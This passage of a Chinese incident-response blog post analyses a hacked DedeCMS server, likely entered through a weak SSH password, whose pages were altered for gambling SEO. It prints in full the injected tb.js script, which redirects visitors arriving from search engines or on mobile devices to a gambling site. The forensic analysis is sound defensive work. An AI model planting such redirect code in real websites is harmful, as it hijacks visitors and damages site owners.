当前位置：首页 > news >正文

记一次服务器入侵事件的应急响应

news 2025/7/7 1:08:17

0x01 事件背景

8月某日，客户官网被黑，需在特定时间内完成整改。为避免客户业务受到影响，实验室相关人员第一时间展开本次攻击事件的应急处理。

0x02 事件分析

网站源码被篡改，攻击者一定获取到了权限，那么接下来的思路就是推测攻击者入侵手段，找到业务脆弱点，对服务器进行全方位排查，找到攻击者留下来的痕迹并进行分析处理。

2.1 信息收集

与客户简单沟通后，得知如下基本信息：

官网服务器为租赁的阿里云虚拟专用服务器
虚拟专用服务器上部署的官网后台使用了DedeCMS织梦系统
虚拟专用服务器安装了宝塔面板服务器运维系统
虚拟专用服务器安装的宝塔面板的密码已被篡改

2.2 攻击入口判断

服务器开放了SSH、宝塔、DedeCMS等3个服务，那么接下来我们从服务器开放的服务来推测可能的攻击入口。

玩过宝塔的朋友都知道，宝塔后台路径未知的情况下，通过宝塔后台GetShell基本上是不可能的。此外，客户设置的BT面板的用户名也有些复杂，所以推断攻击者从宝塔下手的可能性很小（这里埋个坑，前面提到客户宝塔后台密码被修改的情况，后面会说到原因）。

客户官网使用的DedeCMS版本为 v5.7
sp2，尝试所有公开漏洞均未成功。并且，DedeCMS的后台密码没有规律，所以推测从DedeCMS入侵的可能性也不是很大。

客户给出了服务器的账号密码，我们的第一反应是入侵从SSH弱口令开始的。因为我的爆破字典里包含了服务器的密码（手动笑哭），但这显然还不能直接让客户信服。

综上，高度怀疑服务器是被爆破SSH弱口令后导致了后续的入侵行为。

2.3 应急响应

在判断攻击入口后，我们登录客户的服务器，仔细抡了一遍，只能说服务器上的东西有点多。。。

2.3.1 BC黑页 &PHP后门

首先访问客户首页，发现官网页面表面没有任何异常，也并未被重定向到BC网站。但是实际上网页Meta信息被篡改，且会异步请求BC网站和百度统计的若干接口。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eemX4nRT-1677205556073)(https://image.3001.net/images/20220908/1662604126_6319535e83d98569a6a68.png!small)]

推测攻击者的目的应为BC网站SEO优化，提高网站的SEO排名。

定位到服务器上的DedeCMS网站源码，发现源码在7月17日被修改植入了恶意代码。

网站源码被插入2个新的meta元素，以及一段JavaScript代码。下图为新增的meta元素，解码后发现是菠菜搜索关键词。

新插入的JavaScript代码如下图所示。解码后发现是一段引用外部js的代码。

恶意js文件的内容为：

1662693667_631ab1231422125940ce2.png!small?1662693666820

此文件的作用就是插入https://sjbgw2022.com/tb.js的恶意文件以及对恶意SEO优化。

继续查看tb.js这个文件内容：

//这里省略一大段代码，因为代码内容与ly.js内容一致都是对恶意SEO的优化
//上面的代码与之前一样作用就是推送自动收录。
//JS正则表达式判断来路，如果是下列搜索引擎则指定跳转网址。
var regexp=/\.(sogou|soso|baidu|bsb|youdao|lanjie|bing|118114|biso|sm|qq|so|safe|toutiao|biso|360)(\.[a-z0-9\-]+){1,2}\//ig;
var where =document.referrer;
if(regexp.test(where))
{
window.location.href="https://tb04.cc/";//满足就跳转至菠菜页面。
}//更详细的检测，判断是否包含搜索引擎字段，是则跳转至菠菜页面。var sp_regexps =/\.(yahoo|google|baidu|soso|sogou|bing|sou|so|360|haosou|youdao|sooule|easou|aliyun|sina|jike|Yisou|uc|sm)\./gi;
var sp_whereis = window.location.referrer;
try {sp_whereis = top.document.referrer;
} catch (e) {}
try {sp_whereis = window.parent.document.referrer;
} catch (e) {}
var sp_domains = window.location.host;
try {sp_domains = top.document.domain;
} catch (e) {}
try {sp_domains = window.parent.document.domain;
} catch (e) {}
if (sp_regexps.test(sp_whereis)) {window.location.href = 'https://tb04.cc';parent.window.opener.location = 'https://tb04.cc';
}//判断是否是移动端，满足也跳转至菠菜页面。
function browserRedirect() {var sUserAgent = navigator.userAgent.toLowerCase();var bIsIpad = sUserAgent.match(/ipad/i) == 'ipad';var bIsIphoneOs = sUserAgent.match(/iphone os/i) == 'iphone os';var bIsMidp = sUserAgent.match(/midp/i) == 'midp';var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == 'rv:1.2.3.4';var bIsAndroid = sUserAgent.match(/android/i) == 'android';var bIsCE = sUserAgent.match(/windows ce/i) == 'windows ce';var bIsWM = sUserAgent.match(/windows mobile/i) == 'windows mobile';if (!(bIsIphoneOs || bIsMidp || bIsAndroid || bIsCE || bIsWM)) {} else {window.location.href = 'https://tb04.cc';}
}
browserRedirect();

发现这个文件的作用是恶意SEO优化，判断访问网站的来路，如果是从搜索引擎过来的就会跳转至菠菜页面，如果是直接访问官网则不会有变化。菠菜页面截图如下所示：